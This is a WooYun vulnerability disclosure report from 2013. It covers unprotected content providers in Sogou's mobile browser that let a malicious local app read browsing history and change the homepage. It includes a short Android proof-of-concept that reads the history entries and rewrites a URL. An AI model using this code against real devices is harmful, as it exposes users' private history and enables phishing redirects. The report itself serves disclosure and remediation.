当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042609

漏洞标题:搜狗手机浏览器隐私泄露和主页篡改漏洞二合一(需要手机里有恶意应用)

相关厂商:搜狐

漏洞作者: Pentest.mobi

提交时间:2013-11-11 18:57

修复时间:2013-12-26 18:58

公开时间:2013-12-26 18:58

漏洞类型:敏感信息泄露

危害等级:低

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-11: 细节已通知厂商并且等待厂商处理中
2013-11-11: 厂商已经确认,细节仅向厂商公开
2013-11-21: 细节向核心白帽子及相关领域专家公开
2013-12-01: 细节向普通白帽子公开
2013-12-11: 细节向实习白帽子公开
2013-12-26: 细节向公众公开

简要描述:

搜狗手机浏览器存在漏洞,恶意攻击者利用本地的恶意app盗取用户的浏览记录隐私,修改浏览器主页为任意的钓鱼网站。

详细说明:

漏洞原因:
几个重要的content provider都没做任何权限限制。
攻击代码:

Uri contentUri2 = Uri.parse("content://sogou.mobile.explorer/quicklaunch");
Cursor c = getContentResolver().query(contentUri1, null, null, null, null);
String xc ="";
if (c.moveToFirst()) {
for (int i = 0; i < c.getCount(); i++) {
c.moveToPosition(i);
String title = c.getString(1);
String url = c.getString(2);
xc=xc + title + ":" + url + "\r\n";
}
}
ContentValues test = new ContentValues();
test.put("url", "http://www.qq.com");
int xxx = getContentResolver().update(contentUri2,test,"_id=?",new String[]{"1"});


漏洞证明:

我没有打开草榴 - -!!!

1.jpg


点击SOHU,打开的是QQ.com,如果是钓鱼呢 - -!!

Screenshot_2013-11-11-18-40-53.png


Screenshot_2013-11-11-18-43-26.png


修复方案:

对content provider做权限限制。

版权声明:转载请注明来源 Pentest.mobi@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-11-11 19:08

厂商回复:

感谢支持。

最新状态:

暂无